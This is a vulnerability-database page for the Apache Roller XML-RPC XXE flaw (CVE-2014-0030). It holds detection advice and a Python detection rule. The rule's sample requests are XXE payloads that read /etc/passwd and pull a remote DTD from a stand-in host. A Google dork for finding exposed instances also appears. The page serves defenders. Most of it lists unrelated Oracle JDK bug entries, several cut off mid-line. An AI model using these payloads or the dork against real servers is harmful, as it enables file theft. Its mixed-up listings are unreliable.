CVE-2014-0030
published 2017-10-10
CVE-2014-0030: The XML-RPC protocol support in Apache Roller before 5.0.3 allows attackers to conduct XML External Entity (XXE) attacks via unspecified vectors.
Priority P266 · critical · 9.8 (CVSS 3.0)
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS 16.87% (96.7th percentile)
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | roller | — | — |
| apache | roller | — | — |
| apache | roller | — | — |
| apache | roller | — | — |
| apache | roller | — | — |
| apache | roller | — | — |
Detection & IOCs (extracted from sources)
- Monitor for unauthenticated or anomalous HTTP POST requests to the Apache Roller XML-RPC endpoint path /roller-services/xmlrpc, which is the attack delivery point for XXE payloads.
- Inspect POST body content to /roller-services/xmlrpc for XML DOCTYPE declarations containing ENTITY definitions (e.g., &xxe; or %dtd; references), which are characteristic of XXE injection attempts.
- Detect outbound HTTP callbacks from the server to attacker-controlled hosts triggered during XML parsing, which indicate the advanced out-of-band XXE variant used by this exploit.
- Use the Google dork to identify exposed vulnerable Apache Roller instances: intext:"apache roller weblogger version {vulnerable_version_number}"
- The vulnerability affects Apache Roller versions before 5.0.3; the exploit script targets the XML-RPC protocol support. Ensure the endpoint /roller-services/xmlrpc is disabled or access-controlled if upgrading is not immediately possible.
- The exploit has two modes: a simple in-band file disclosure mode (reading files like /etc/passwd directly in the XML-RPC fault response) and an advanced out-of-band mode using an attacker-hosted DTD server, requiring detection coverage for both patterns.
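The request-side checks above can be combined into one rule that covers both the in-band and the out-of-band pattern. The following Python sketch is an added example, not a rule from this page or from any vendor; the record layout, the sample bodies, the host `dtd.example.invalid` and the method name `example.ping` are constructed, and it assumes the request body is available to the detector (for example from a reverse proxy or WAF log).

```python
import re

XMLRPC_PATH = "/roller-services/xmlrpc"  # endpoint path named on this page
REMOTE_SCHEMES = {"http", "https", "ftp"}  # fetches that leave the server

DOCTYPE = re.compile(r"<!DOCTYPE\b", re.I)
# group(1) is set only for parameter entities: <!ENTITY % name ...>
ENTITY_DECL = re.compile(r"<!ENTITY\s+(%\s*)?[\w.:-]+", re.I)
# URI scheme of any SYSTEM / PUBLIC external identifier
EXTERNAL_URI = re.compile(
    r"(?:SYSTEM|PUBLIC\s*[\"'][^\"']*[\"'])\s*[\"']\s*([a-z][a-z0-9+.-]*):", re.I)


def decode_body(body: bytes) -> str:
    """Decode as an XML parser would, so UTF-16 bodies cannot slip past."""
    if body[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return body.decode("utf-16", errors="replace")
    if b"\x00" in body[:8]:  # UTF-16 without a byte-order mark
        enc = "utf-16-le" if body[1:2] == b"\x00" else "utf-16-be"
        return body.decode(enc, errors="replace")
    return body.decode("utf-8", errors="replace")


def classify(method: str, path: str, body: bytes) -> str:
    """Return ignore | clean | doctype | xxe-in-band | xxe-out-of-band."""
    if method.upper() != "POST" or path.split("?", 1)[0].rstrip("/") != XMLRPC_PATH:
        return "ignore"
    text = decode_body(body)
    if not DOCTYPE.search(text):
        return "clean"
    has_param_entity = any(m.group(1) for m in ENTITY_DECL.finditer(text))
    schemes = {s.lower() for s in EXTERNAL_URI.findall(text)}
    if has_param_entity or schemes & REMOTE_SCHEMES:
        return "xxe-out-of-band"  # %dtd;-style reference or remote fetch
    if schemes:
        return "xxe-in-band"      # e.g. a file: entity echoed in the fault
    return "doctype"  # assumption: XML-RPC clients never need a DTD, so still alert


def scan(records):
    """records: iterable of (source_ip, method, path, body) -> list of alerts."""
    return [(ip, verdict) for ip, method, path, body in records
            if (verdict := classify(method, path, body)) not in ("ignore", "clean")]


# Constructed request bodies for exercising the rule (not captured traffic).
BENIGN = b'<?xml version="1.0"?><methodCall><methodName>example.ping</methodName></methodCall>'
IN_BAND = (b'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
           b'<methodCall><methodName>&xxe;</methodName></methodCall>')
OUT_OF_BAND = (b'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % dtd SYSTEM '
               b'"http://dtd.example.invalid/x.dtd"> %dtd;]><methodCall/>')

if __name__ == "__main__":
    log = [("192.0.2.10", "POST", XMLRPC_PATH, BENIGN),
           ("192.0.2.66", "POST", XMLRPC_PATH, IN_BAND),
           ("192.0.2.66", "POST", XMLRPC_PATH, OUT_OF_BAND)]
    for alert in scan(log):
        print(alert)
```

A request-side match only shows an attempt; pair out-of-band hits with egress logs from the Roller host to see whether the parser actually made the callback.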
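CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |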
No detection rules found.
Bugzilla
CVE-2013-5904 Oracle JDK: unspecified vulnerability fixed in 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 6.8
CVE-2013-5904 [MEDIUM] CVE-2013-5904 Oracle JDK: unspecified vulnerability fixed in 7u51 (Deployment)
Oracle Java SE 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2013-5904). Upstream has CVSSv2 scored this issue as: 6.8/AV:N/AC:M/Au:N/C:P/I:P/A:P
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
Bugzilla
CVE-2014-0418 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 5.1
CVE-2014-0418 [MEDIUM] CVE-2014-0418 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2014-0418). Upstream has CVSSv2 scored this issue as: 5.1/AV:N/AC:H/Au:N/C:P/I:P/A:P
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Oracle Java for Red Hat Enterprise Linux 6
Oracle Java for Red Hat Enterprise Linux 5
Via RHSA-2014:0414 https://rhn.redhat.com/err
Bugzilla
CVE-2013-5906 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (Install)
bugzilla·2014-01-15·CVSS 5.1
CVE-2013-5906 [MEDIUM] CVE-2013-5906 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (Install)
Oracle Java SE 5.0u71, 6u71 and 7u51 fixes an unspecified vulnerability in the Install component (CVE-2013-5906). Upstream has CVSSv2 scored this issue as: 5.1/AV:N/AC:H/Au:N/C:P/I:P/A:P
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Oracle Java for Red Hat Enterprise Linux 6
Oracle Java for Red Hat Enterprise Linux 5
Via RHSA-2014:0414 https://rhn.redh
Bugzilla
CVE-2013-5889 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 9.3
CVE-2013-5889 [CRITICAL] CVE-2013-5889 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2013-5889). Upstream has CVSSv2 scored this issue as: 9.3/AV:N/AC:M/Au:N/C:C/I:C/A:C
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0135 https://rhn.redhat.com
Bugzilla
CVE-2014-0415 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 10.0
CVE-2014-0415 [CRITICAL] CVE-2014-0415 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2014-0415). Upstream has CVSSv2 scored this issue as: 10.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0135 https://rhn.redhat.co
Bugzilla
CVE-2013-5898 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 4.0
CVE-2013-5898 [MEDIUM] CVE-2013-5898 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2013-5898). Upstream has CVSSv2 scored this issue as: 4.0/AV:N/AC:H/Au:N/C:P/I:P/A:N
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0135 https://rhn.redhat.com
Bugzilla
CVE-2014-0410 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 10.0
CVE-2014-0410 [CRITICAL] CVE-2014-0410 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2014-0410). Upstream has CVSSv2 scored this issue as: 10.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0135 https://rhn.redhat.co
Bugzilla
CVE-2014-0387 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 7.6
CVE-2014-0387 [HIGH] CVE-2014-0387 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2014-0387). Upstream has CVSSv2 scored this issue as: 7.6/AV:N/AC:H/Au:N/C:C/I:C/A:C
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0135 https://rhn.redhat.com
Bugzilla
CVE-2013-5899 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 5.0
CVE-2013-5899 [MEDIUM] CVE-2013-5899 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2013-5899). Upstream has CVSSv2 scored this issue as: 5.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0135 https://rhn.redhat.com
Bugzilla
CVE-2013-5905 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (Install)
bugzilla·2014-01-15·CVSS 5.1
CVE-2013-5905 [MEDIUM] CVE-2013-5905 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (Install)
Oracle Java SE 5.0u71, 6u71 and 7u51 fixes an unspecified vulnerability in the Install component (CVE-2013-5905). Upstream has CVSSv2 scored this issue as: 5.1/AV:N/AC:H/Au:N/C:P/I:P/A:P
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Oracle Java for Red Hat Enterprise Linux 6
Oracle Java for Red Hat Enterprise Linux 5
Via RHSA-2014:0414 https://rhn.redh
Bugzilla
CVE-2013-5887 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 5.0
CVE-2013-5887 [MEDIUM] CVE-2013-5887 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2013-5887). Upstream has CVSSv2 scored this issue as: 5.0/AV:N/AC:L/Au:N/C:N/I:N/A:P
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0135 https://rhn.redhat.com
Bugzilla
CVE-2014-0417 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (2D)
bugzilla·2014-01-15·CVSS 9.3
CVE-2014-0417 [CRITICAL] CVE-2014-0417 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (2D)
Oracle Java SE 5.0u71, 6u71 and 7u51 fixes an unspecified vulnerability in the 2D component (CVE-2014-0417). Upstream has CVSSv2 scored this issue as: 9.3/AV:N/AC:M/Au:N/C:C/I:C/A:C
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0136 https://rhn.redhat.com
Bugzilla
CVE-2014-0403 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 5.8
CVE-2014-0403 [MEDIUM] CVE-2014-0403 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2014-0403). Upstream has CVSSv2 scored this issue as: 5.8/AV:N/AC:M/Au:N/C:P/I:P/A:N
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0135 https://rhn.redhat.com
Bugzilla
CVE-2013-5902 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 5.1
CVE-2013-5902 [MEDIUM] CVE-2013-5902 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2013-5902). Upstream has CVSSv2 scored this issue as: 5.1/AV:N/AC:H/Au:N/C:P/I:P/A:P
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Oracle Java for Red Hat Enterprise Linux 6
Oracle Java for Red Hat Enterprise Linux 5
Via RHSA-2014:0414 https://rhn.redhat.com/err
Bugzilla
CVE-2013-5870 CVE-2013-5895 CVE-2014-0382 Oracle JDK: multiple unspecified vulnerabilities fixed in 7u51 (JavaFX)
bugzilla·2014-01-15·CVSS 6.8
CVE-2013-5870 [MEDIUM] CVE-2013-5870 CVE-2013-5895 CVE-2014-0382 Oracle JDK: multiple unspecified vulnerabilities fixed in 7u51 (JavaFX)
Oracle Java SE 7u51 fixes multiple unspecified vulnerabilities in the JavaFX component. Upstream has CVSSv2 scored these issues as:
CVE-2013-5870 6.8/AV:N/AC:M/Au:N/C:P/I:P/A:P
CVE-2013-5895 5.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
CVE-2014-0382 4.3/AV:N/AC:M/Au:N/C:N/I:N/A:P
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
Bugzilla
CVE-2014-0375 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 5.8
CVE-2014-0375 [MEDIUM] CVE-2014-0375 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2014-0375). Upstream has CVSSv2 scored this issue as: 5.8/AV:N/AC:M/Au:N/C:P/I:P/A:N
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0135 https://rhn.redhat.com
Bugzilla
CVE-2014-0424 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 7.5
CVE-2014-0424 [HIGH] CVE-2014-0424 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2014-0424). Upstream has CVSSv2 scored this issue as: 7.5/AV:N/AC:L/Au:N/C:P/I:P/A:P
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0135 https://rhn.redhat.com
Bugzilla
CVE-2013-5888 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 4.6
CVE-2013-5888 [MEDIUM] CVE-2013-5888 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2013-5888). Upstream has CVSSv2 scored this issue as: 4.6/AV:L/AC:L/Au:N/C:P/I:P/A:P
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0135 https://rhn.redhat.com
https://liftsecurity.io/advisories/Apache_Roller_XML-RPC_susceptible_to_XXE/
https://mail-archives.apache.org/mod_mbox/roller-dev/201401.mbox/%3CCAF1aazCMzDGB12Ls4t-SOwNA=OdguD010LX3yZGhk2GQHafFXw%40mail.gmail.com%3E
https://www.exploit-db.com/exploits/45341/
Published: 2017-10-10